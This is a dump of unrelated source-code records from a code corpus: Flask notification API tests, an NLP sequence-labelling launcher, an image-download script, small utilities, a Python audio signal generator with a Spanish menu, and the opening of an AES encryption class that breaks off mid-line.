name=\"test test\",\n roles={\n 'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid'\n },\n image_url=\"https://lh6.googleusercontent.com/-1DhBLOJentg\"\n \"/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50\"\n )\n self.regular_user.save()\n self.notification1 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification1.save()\n self.notification2 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification2.save()\n self.notification3 = Notification.create(\n \"New contribution was created\",\n \"contribution\",\n self.contribution.id,\n self.regular_user.id,\n userId='-ktestuser',\n userName=\"random fellow\",\n userImg=\"random.jpeg\"\n )\n self.notification3.read = 1\n self.notification3.save()\n\n def test_request_does_not_contain_headers(self):\n response = self.client.get('/api/v1/notifications')\n response_data = json.loads(response.data)\n self.assert400(response)\n self.assertEqual(response_data['data']['message'],\n 'Bad request. Header does not contain authorization'\n ' token')\n\n def test_fetch_all_notifications(self):\n '''\n Test that a user can see all contribution notifications\n '''\n response = self.client.get('/api/v1/notifications', headers=self.regular_header)\n notifs_number = Notification.query_redis(self.regular_user.id)\n response_data = json.loads(response.data)\n self.assertEqual(len(response_data['data']['notifications']), len(notifs_number))\n \n self.assert200(response)\n\n def test_user_get_single_notification(self):\n '''\n Test that a user can get a single notification\n '''\n\n response = self.client.get(\n 'api/v1/notifications/{}'.format(self.notification1.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200),\n self.assertTrue('recipientId' in generated_response['data'])\n self.assertTrue('id' in generated_response['data'])\n self.assertTrue('message' in generated_response['data'])\n self.assertTrue('category' in generated_response['data'])\n\n def test_no_existing_notification(self):\n '''\n Test a user gets a 404 when trying to access a non-existent notification\n '''\n \n response = self.client.get(\n 'api/v1/notifications/obegiawr',\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 404)\n self.assertEqual(generated_response['message'], 'Notification does not exist!')\n \n def test_request_does_not_contain_headers_patch_single_notification(self):\n response = self.client.patch('/api/v1/notifications/-test_notif_id')\n response_data = json.loads(response.data)\n self.assert400(response)\n self.assertEqual(response_data['data']['message'],\n 'Bad request. Header does not contain authorization'\n ' token')\n \n def test_user_patch_single_notification_read_status_to_True(self):\n notif = Notification.query_redis(self.regular_user.id, self.notification1.id)\n self.assertTrue(not notif['read'])\n response = self.client.patch(\n 'api/v1/notifications/{}'.format(self.notification1.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(generated_response['data']['notification']['read'])\n \n def test_user_patch_single_notification_read_status_to_False(self):\n notif = Notification.query_redis(self.regular_user.id, self.notification3.id)\n self.assertTrue(notif['read'])\n response = self.client.patch(\n 'api/v1/notifications/{}'.format(self.notification3.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(not generated_response['data']['notification']['read'])\n\n def test_user_patch_all_notification_read_status_to_True(self):\n notifs = Notification.query_redis(self.regular_user.id)\n self.assertTrue(notifs[0]['read'])\n self.assertTrue(not notifs[1]['read'])\n self.assertTrue(not notifs[2]['read'])\n response = self.client.patch(\n 'api/v1/notifications',\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(generated_response['data']['notifications'][0]['read'])\n self.assertTrue(generated_response['data']['notifications'][1]['read'])\n self.assertTrue(generated_response['data']['notifications'][2]['read'])\n\n def test_contribution_approved_notification(self):\n user_notifications_before = Notification.get_count(self.regular_user.id)\n\n data = {\"status\": \"approved\"}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n\n user_notifications_after = Notification.get_count(self.regular_user.id)\n\n self.assertTrue(user_notifications_after > user_notifications_before)\n\n def test_contribution_archived_notification(self):\n user_notifications_before = Notification.get_count(self.regular_user.id)\n\n data = {\"status\": 'archived'}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n\n user_notifications_after = Notification.get_count(self.regular_user.id)\n\n self.assertTrue(user_notifications_after > user_notifications_before)\n\n @patch('flask_sse.sse.publish')\n def test_contribution_approved_notification_stream(self, mock):\n data = {\"status\": \"approved\"}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n self.assertTrue(mock.called)\n","sub_path":"test/api/views/test_notifications.py","file_name":"test_notifications.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261226263","text":"\n\nfrom xai.brain.wordbase.nouns._violation import _VIOLATION\n\n#calss header\nclass _VIOLATIONS(_VIOLATION, ):\n\tdef __init__(self,): \n\t\t_VIOLATION.__init__(self)\n\t\tself.name = \"VIOLATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"violation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_violations.py","file_name":"_violations.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"160626060","text":"# -*- coding: utf-8 -*-\n\n\nimport argparse\nimport sys\nimport random\nimport copy\n\nimport torch\nimport numpy\n\nfrom nlp_tasks.absa.utils import argument_utils\nfrom nlp_tasks.absa.mining_opinions.sequence_labeling import sequence_labeling_train_templates as templates\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--current_dataset', help='dataset name', default='RealASOTripletRest16', type=str)\nparser.add_argument('--task_name', help='task name', default='ate', type=str)\nparser.add_argument('--data_type', help='data type', default='common', type=str)\nparser.add_argument('--model_name', help='model name', default='NerLstm', type=str)\nparser.add_argument('--timestamp', help='timestamp', default=int(1571400646), type=int)\nparser.add_argument('--train', help='if train a new model', default=False, type=argument_utils.my_bool)\nparser.add_argument('--evaluate', help='evaluate', default=False, type=argument_utils.my_bool)\nparser.add_argument('--predict', help='predict text', default=False, type=argument_utils.my_bool)\nparser.add_argument('--predict_test', help='predict test set', default=True, type=argument_utils.my_bool)\nparser.add_argument('--epochs', help='epochs', default=100, type=int)\nparser.add_argument('--batch_size', help='batch_size', default=32, type=int)\nparser.add_argument('--patience', help='patience', default=10, type=int)\nparser.add_argument('--visualize_attention', help='visualize attention', default=False, type=argument_utils.my_bool)\nparser.add_argument('--embedding_filepath', help='embedding filepath',\n default='D:\\program\\word-vector\\glove.840B.300d.txt', type=str)\nparser.add_argument('--embed_size', help='embedding dim', default=300, type=int)\nparser.add_argument('--seed', default=776, type=int)\nparser.add_argument('--repeat', default='0', type=str)\nparser.add_argument('--device', default=None, type=str)\nparser.add_argument('--gpu_id', default='0', type=str)\nparser.add_argument('--position', default=False, type=argument_utils.my_bool)\nparser.add_argument('--position_embeddings_dim', help='position embeddings dim', default=32, type=int)\nparser.add_argument('--debug', default=False, type=argument_utils.my_bool)\nparser.add_argument('--early_stopping_by_batch', default=False, type=argument_utils.my_bool)\n\nparser.add_argument('--crf', help='True for crf tagger, False for simple tagger', default=False,\n type=argument_utils.my_bool)\n\nparser.add_argument('--fixed_bert', default=True, type=argument_utils.my_bool)\nparser.add_argument('--learning_rate_in_bert', default=2e-5, type=float)\nparser.add_argument('--l2_in_bert', default=0.00001, type=float)\nparser.add_argument('--lstm_layer_num_in_bert', default=1, type=int)\nparser.add_argument('--bert_file_path', help='bert_file_path',\n default=r'D:\\program\\word-vector\\bert-base-uncased.tar.gz', type=str)\nparser.add_argument('--bert_vocab_file_path', help='bert_vocab_file_path',\n default=r'D:\\program\\word-vector\\uncased_L-12_H-768_A-12\\vocab.txt', type=str)\nparser.add_argument('--max_len', help='max length', default=100, type=int)\n\nparser.add_argument('--include_conflict', default=False, type=argument_utils.my_bool)\n\nargs = parser.parse_args()\n\nargs.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if args.device is None else torch.device(args.device)\ngpu_ids = args.gpu_id.split(',')\nif len(gpu_ids) == 1:\n args.gpu_id = -1 if int(gpu_ids[0]) == -1 else 0\nelse:\n args.gpu_id = list(range(len(gpu_ids)))\n\n\nconfiguration = args.__dict__\n\nif configuration['seed'] is not None:\n random.seed(configuration['seed'])\n numpy.random.seed(configuration['seed'])\n torch.manual_seed(configuration['seed'])\n torch.cuda.manual_seed(configuration['seed'])\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\nmodel_name_complete_prefix = 'model_name_{model_name}-include_conflict_{include_conflict}'.format_map(configuration)\n\nconfiguration_for_this_repeat = copy.deepcopy(configuration)\nconfiguration_for_this_repeat['model_name_complete'] = '%s.%s' % (model_name_complete_prefix, args.repeat)\n\nmodel_name = configuration['model_name']\nif model_name in ['NerLstm']:\n template = templates.NerLstm(configuration_for_this_repeat)\nelif model_name in ['NerBert']:\n template = templates.NerBert(configuration_for_this_repeat)\nelse:\n raise NotImplementedError(model_name)\n\nif configuration_for_this_repeat['train']:\n template.train()\n\nif configuration_for_this_repeat['evaluate']:\n template.evaluate()\n\nif configuration_for_this_repeat['predict_test']:\n output_filepath = template.model_dir + 'result_of_predicting_test.txt'\n print('result_of_predicting_test:%s ' % output_filepath)\n template.predict_test(output_filepath, only_error=False)\n\nif configuration_for_this_repeat['predict']:\n texts = [\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n ]\n texts_preprocessed = []\n for text in texts:\n text_preprocessed = {\n 'words': text['words'].split(' ')\n }\n texts_preprocessed.append(text_preprocessed)\n result = template.predict(texts_preprocessed)\n print(result)\n\n","sub_path":"nlp_tasks/absa/mining_opinions/sequence_labeling/ate_bootstrap.py","file_name":"ate_bootstrap.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200262940","text":"import pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\n\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\n\n \ndf = pd.read_excel('/Users/jing/Downloads/00002_NEW IN_WOMAN_excel.xlsx', sheetname='Products')\nprint(\"Column headings:\")\n\n\nprint(len(df['Urls to images (spaced)']))\n\nimages = df['Urls to images (spaced)']\nsku = df['Sku']\n\nprint(len(images))\nprint(len(sku))\n\n\nfor i in range(len(images)):\n\turl = images[i].split()[0]\n\tname = sku[i]\n\tprint(i, name, url)\n\t\n\tresponse = requests.get(url)\n\timg = Image.open(BytesIO(response.content))\n\timg.save(\"/Users/jing/Desktop/skuimages/\" + name + \".png\", \"png\")\n\n\n","sub_path":"ml method/get_all_images.py","file_name":"get_all_images.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"148108827","text":"import yaml\n\n\nclass Config:\n def __init__(self, config_file):\n with open(config_file, 'r') as yml:\n config = yaml.load(yml)\n self.model_obj_path = config[\"model_obj_path\"]\n self.model_scene_path = config[\"model_scene_path\"]\n self.sqlite_path = config[\"sqlite_path\"]\n self.ngt_obj_path = config[\"ngt_obj_path\"].encode('utf-8')\n self.ngt_scene_path = config[\"ngt_scene_path\"].encode('utf-8')\n\n self.images_dir = config[\"images_dir\"]\n self.tumnail_dir = config[\"tumnail_dir\"]\n self.static_dir = config[\"static_dir\"]\n","sub_path":"anealing/samples/image_search/scripts/app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487464048","text":"import sys\nfrom math import ceil, log\ninput = sys.stdin.readline\n\nN , M = map(int,input().split())\nk = ceil(log(N,2))\ntreesize = (2**(k+1)) -1\nt = [ 100001 for i in range(treesize)]\nx = (2**k)\n\nfor i in range(x-1, N+x-1):\n t[i] = int(input())\n\nfor i in range( treesize - 2, 0 , -2 ):\n t[i//2] = min(t[i],t[i+1])\n\ndef func(a,b):\n global t\n if a == b:\n return t[a]\n else:\n if a % 2 == 0 and b % 2 == 1:\n if b - a == 1:\n return min( t[a] , t[b] )\n else:\n return min ( t[a], t[b], func(a+1,b-1) ) \n\n if a % 2 == 0 and b % 2 == 0:\n return min ( t[a] , func(a+1,b) )\n\n if a % 2 == 1 and b % 2 == 0:\n return func(a//2, b//2-1)\n \n if a % 2 == 1 and b % 2 == 1:\n return min( t[b] ,func(a,b-1) )\n\nfor i in range(M):\n a , b = map(int,input().split())\n ra , rb = x - 2 + a, x + b - 2\n print(func(ra,rb))\n","sub_path":"BoJ/BoJ.10868.py","file_name":"BoJ.10868.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147421455","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated at 2019-03-08 09:33\n\n@author: Haitao Liu; htyeim@gmail.com\n\"\"\"\n\nimport os\nimport glob\nimport pandas as pd\nfrom astropy.time import Time as ATime\nimport time\nimport subprocess\n\n\ndef FUN_run_command(command, timeout=60.0, shell=False, try_N=2, need_print=True):\n if command == \"\":\n return ''\n if need_print:\n print('\\r{} start timeout={}: {}'.format(pd.Timestamp.now(), timeout, command, ),\n end=' ', flush=True)\n if shell:\n command_str = command\n # result = subprocess.run(\n # command, shell=shell, check=True,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.STDOUT,\n # timeout=timeout)\n else:\n command_str = command.split(' ')\n # if len(command_str) == 1:\n # pass\n # else:\n # command_str = [command_str[0], ' '.join(command_str[1:])]\n try_i = 0\n result = None\n while try_i < try_N:\n try_i += 1\n try:\n result = subprocess.run(\n command_str, shell=shell, check=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n timeout=timeout)\n break\n except:\n # return None\n print()\n pass\n if result is None:\n return None\n if need_print:\n print('\\r end {} {}'.format(command_str, result.returncode),\n end='\\r', flush=True)\n return result.stdout\n pass\n\n\n# datetime\ndef MJD2datetime(mjd):\n dt = ATime(mjd, format='mjd').datetime\n return dt\n\n\ndef get_path_doy(path_root='', year=2017, doy=1):\n return '{}/{:0>4d}/{:0>3d}'.format(path_root, year, doy)\n\n\n# range\n\ndef get_datetime_range(dt, begin=-0.5, end=1.5):\n dt = pd.Timestamp(dt)\n return [dt + pd.Timedelta(hours=i) for i in [begin, end]]\n\n\n# folder\n\nclass Lock_file():\n def __init__(self, filename=None):\n self.lock_file = filename\n pass\n\n def remove_lock_file(self):\n lock_file = self.lock_file\n if lock_file is None:\n print('lock file is None.')\n return\n if os.path.isfile(lock_file):\n os.system('rm {}'.format(lock_file))\n else:\n print('lock file not exist?')\n remove_empty_folder(os.path.dirname(lock_file))\n\n def add_lock_file(self, filename=None, replace=False):\n if filename is None:\n filename = self.lock_file\n if filename is None:\n print(\"need to specify the lock filename!\")\n return None\n start_time = pd.Timestamp.now()\n try_i = 0\n wait_seconds = 66.6\n while True:\n if replace:\n break\n if os.path.isfile(filename):\n print(\"\\r waiting from {} . {} {} s..file existed {}\".format(\n start_time, try_i, wait_seconds, filename, ), end=' ', flush=True)\n try_i += 1\n time.sleep(66.6)\n continue\n break\n self.lock_file = filename\n check_folder(os.path.dirname(filename))\n with open(filename, 'w') as f:\n f.write('{} UTC'.format(pd.Timestamp.utcnow()))\n return filename\n\n\ndef check_folder(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef remove_empty_folder(path=None, removeRoot=True, depth=0):\n if depth < 0:\n return\n if path is None:\n return\n 'Function to remove empty folders'\n if not os.path.isdir(path):\n return\n # remove empty subfolders\n files = os.listdir(path)\n if len(files):\n for f in files:\n fullpath = os.path.join(path, f)\n if os.path.isdir(fullpath):\n remove_empty_folder(fullpath, depth=depth - 1)\n\n # if folder empty, delete it\n if os.path.isdir(path):\n files = os.listdir(path)\n if len(files) == 0 and removeRoot:\n print(\"Removing empty folder: {}\".format(path))\n os.rmdir(path)\n remove_empty_folder(os.path.dirname(os.path.normpath(path)))\n","sub_path":"htyeimpg/Funs.py","file_name":"Funs.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"515314392","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('authors', '0055_auto_20151007_1259'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='abstract',\n name='tags',\n field=models.CharField(default='default', max_length=250),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='abstract',\n name='abstract',\n field=models.TextField(help_text=b'Pasting your abstract text will help us make your work searchable.', max_length=50000),\n ),\n migrations.AlterField(\n model_name='abstract',\n name='date',\n field=models.DateTimeField(default=datetime.datetime(2015, 10, 7, 14, 24, 28, 504636)),\n ),\n ]\n","sub_path":"authors/migrations/0056_auto_20151007_1424.py","file_name":"0056_auto_20151007_1424.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"140207674","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.signal as sc\nimport simpleaudio as sa\nimport os\n\n\nN=10000 # Cantidad de períodos \ncantidad=1 # Cantidad de veces que se repite la señal\nfase = 0 # Fase de la señal en radianes\namp = 1.0 # Ampitud de la señal\nf = 1000 # Frecencia de la señal\nB = 2500 # Frecuencia de batido\nfs = 44100 # Frecuencia de muestreo en Hz, ver frecuencias soportadas de\n # la place de sonido\n\n#sec = 1 # Cuantos segundos se quiere reproducir\n\n#t = np.arange(0,sec,1/fs)\n\n#note = (2**15-1)*np.sin(2 * np.pi * B/2*(t/sec) *t) #sweept\n\n#steps=10\n#note=np.array([])\n#for i in range(steps):\n# note=np.append(note,[(2**15-1)*np.sin(2 * np.pi * B*(i/steps) *t)])\n\n#note = (2**15-1)*np.sin(2 * np.pi * B * t) # Señal senoidal a reproducir\n#note = (2**15-1)*sc.sawtooth(2 * np.pi * f * t) # Señal triangular a reproducir\n#note = (2**15-1)*sc.square(2 * np.pi * f * t) # Señal cuadrada a reproducir\n\n\n# Función senoidal\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# fase --> fase de la señal en radianes\n# Devuelve:\n# f1 --> vector de señal de la señal \n# n --> vector de tienpos de sampling \ndef senoidal(fs,f,amp,muestras,fase):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n f1=(2**15-1)*amp*np.sin(2*np.pi*f*n+fase) # Definimos el Vector de Frecuencias\n return f1,n\n\n# Función cuadrada\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# Devuelve:\n# t --> vector de valores temporales\n# senal --> vector de valores de la señal \ndef cuadrada(fs,f,amp,muestras):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n return (2**15-1)*amp*sc.square(2*np.pi*n*f),n\n\n\n\n# Función triangular\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# Devuelve:\n# t --> vector de valores temporales\n# senal --> vector de valores de la señal\ndef triangular(fs,f,amp,muestras):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n return (2**15-1)*sc.sawtooth(2*np.pi*f*n,1),n\n\n\ndef senoidalSuma(fs,f,amp,muestras,fase,B):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n # Definimos el Vector de Frecuencias\n f1=(2**15-1)*0.7*amp*np.sin(2*np.pi*f*n+fase)+(2**15-1)*0.3*amp*np.sin(2*np.pi*B*n) \n return f1,n\n\ndef senoidalB(fs,f,amp,muestras,fase,B):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n f1=(2**15-1)*np.sin(2*np.pi*B/2*n*n) #sweept\n return f1,n\n\n# Grafica la señal\ndef graficar(encabezado,funcion,n,xlim):\n global f\n fig = plt.figure(1)\n plt.suptitle(encabezado)\n plt.subplots_adjust(left=0.08, bottom=0.08, right=0.98, top=0.9, wspace=0.4, hspace=0.8)\n \n s1 = fig.add_subplot(1,1,1)\n plt.title(\"Señal\")\n plt.xlabel(\"Tiempo(s)\")\n plt.ylabel(\"Amplitud\")\n plt.xlim(0,xlim)\n s1.grid(True)\n s1.plot(n,funcion,'b-')\n plt.show()\n return\n\n\ndef reproducir(note):\n audio = note.astype(np.int16) #tranforma la variable note a entero de 16bits y lo guarda en audio\n for i in range(cantidad):\n play_obj = sa.play_buffer(audio, 1, 2, fs) # sale el audio\n play_obj.wait_done() # espera que termine la linea anterior\n\n\ndef op_senoidal():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=======Señal Senoidal=========\")\n print(\"==============================\")\n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidal(fs,f,amp,N,fase)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Senoidal -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef op_cuadrada():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=======Señal Cuadrada=========\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=cuadrada(fs,f,amp,N)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Cuadrada -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef op_triangular():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"======Señal Triangular========\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=triangular(fs,f,amp,N)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Triangular -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef op_senoidalB():\n global B\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=Señal Barrido de Senoidales==\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidalB(fs,f,amp,N,fase,B)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Barrido de 2 senoidales-->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,200/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\n\ndef op_senoidalSuma():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"===Señal Suma de Senoidales===\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidalSuma(fs,f,amp,N,fase,B)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Suma de 2 senoidales -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef valores():\n global N,fs,amp,fase,cantidad,B,f\n os.system(\"clear\")\n print(\"----------------------------------------------------\") \n print(\"Los valores actuales son:\\n\")\n print(\"La frecuencia de la señal es={}\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp))\n print(\"La cantidad de períodos es N={}\".format(N))\n print(\"La fase de la señal en radianes es={}*Pi radianes\".format(fase))\n print(\"----------------------------------------------------\") \n print(\"La frecuencia de fs={}Hz, y el ts={}seg\".format(fs,1/fs)) \n print(\"La cantidad de veces que se desea repetir es={}\".format(cantidad))\n print(\"La frecuencia de B={}Hz\".format(B))\n consulta=input(\"Desea cambiar los valores S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n valor=input(\"Ingrese la frecuencia Hz de la señal f =\")\n if valor.isdigit():\n f=int(valor)\n valor=input(\"Ingrese la amplitud de la señal entre 0 a 100% =\")\n if valor.isdigit():\n amp=float(valor)/100 \n valor=input(\"Ingrese la cantidad de períodos a visualzar N =\")\n if valor.isdigit():\n N=int(valor)\n valor=input(\"Ingrese la fase en grados( enteros) entre 0 a 360 =\")\n if valor.isdigit():\n fase=float(valor)*np.pi/180 \n valor=input(\"Ingrese la frecuencia Hz de sampling fs =\")\n if valor.isdigit():\n fs=int(valor) \n valor=input(\"Ingrese la cantidad de veces que desea repetir la señal visualizada =\")\n if valor.isdigit():\n cantidad=int(valor) \n print(\"El tiempo de sampleo es ts={}\".format(1/fs))\n valor=input(\"Ingrese la frecuencia Hz de B =\")\n if valor.isdigit():\n B=int(valor)\n input(\"Presiona cualquier tecla para continuar\")\n os.system(\"clear\")\n \n\n#================================================================\n# Inicio del programa principal\n#================================================================\nmenu=\"\"\"\nProgramas de la transformada Discreta de Fourier\nelija una opción:\n\n[1] Señal senoidal (fs,f,amp,muestras,fase)\n[2] Señal cuadrada (fs,f,amp,muestras)\n[3] Señal triangular (fs,f,amp,muestras)\n[4] Suma de frecuencias senoidames 0.7*f+0.3*B\n[5] Barrido de frecuencias senoidales de f a B\n\n[6] TBD\n[7] TBD\n[8] Seteo de frecuencia de la señal de entrada, número de muestras, frecuencia \nde sampling\n[9] Salir\n\"\"\"\n\nwhile(True):\n os.system(\"clear\")\n print(menu)\n\n opcion=input(\"Elija una opción: \")\n\n if opcion== '1':\n op_senoidal()\n elif opcion== '2':\n op_cuadrada()\n elif opcion== '3':\n op_triangular() \n elif opcion== '4':\n op_senoidalSuma()\n elif opcion== '5':\n op_senoidalB()\n elif opcion== '6':\n pass\n elif opcion== '7':\n pass\n elif opcion== '8':\n valores()\n elif opcion== '9':\n os.system(\"clear\")\n print(\"Gracias por usar el programa !!!\")\n exit (0)\n else:\n print(\"No selecionó una opción válida\\n\\r\")","sub_path":"Programas/TP2/linux/audio_gen_folino.py","file_name":"audio_gen_folino.py","file_ext":"py","file_size_in_byte":11052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356905403","text":"from drawGraph import plotGraph\nimport time as clock\nfrom secrets import token_bytes\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\nclass AES_Encryption:\n def __init__(self, number_of_byte, mode):\n self.mode = mode\n self.iv = Random.new().read(AES.block_size)\n self.key = token_bytes(number_of_byte)\n file = open('AES_keys.txt', 'r+')\n file.write(str(self.key))\n if self.mode == AES.MODE_ECB:\n self.cipher = AES.new(self.key, self.mode)\n else:\n self.cipher = AES.new(self.key, self.mode, self.iv)\n file = open('AES_plain_text.txt', 'r')\n self.plain_text = file.read()\n self.encrypted_text = ''\n self.padded_text = ''\n\n def pad_message(self, message):\n while len(message) % 16 != 0:\n message = message + ' '\n return message\n\n def encrypt(self):\n if self.mode == AES.MODE_ECB:\n self.padded_text = self.plain_text if len(self.plain_text) % 16 == 0 else self.pad_message(self.plain_text)\n else:\n self.padded_text = self.plain_text\n self.encrypted_text = self.cipher.encrypt(bytes(self.padded_text.encode()))\n file = 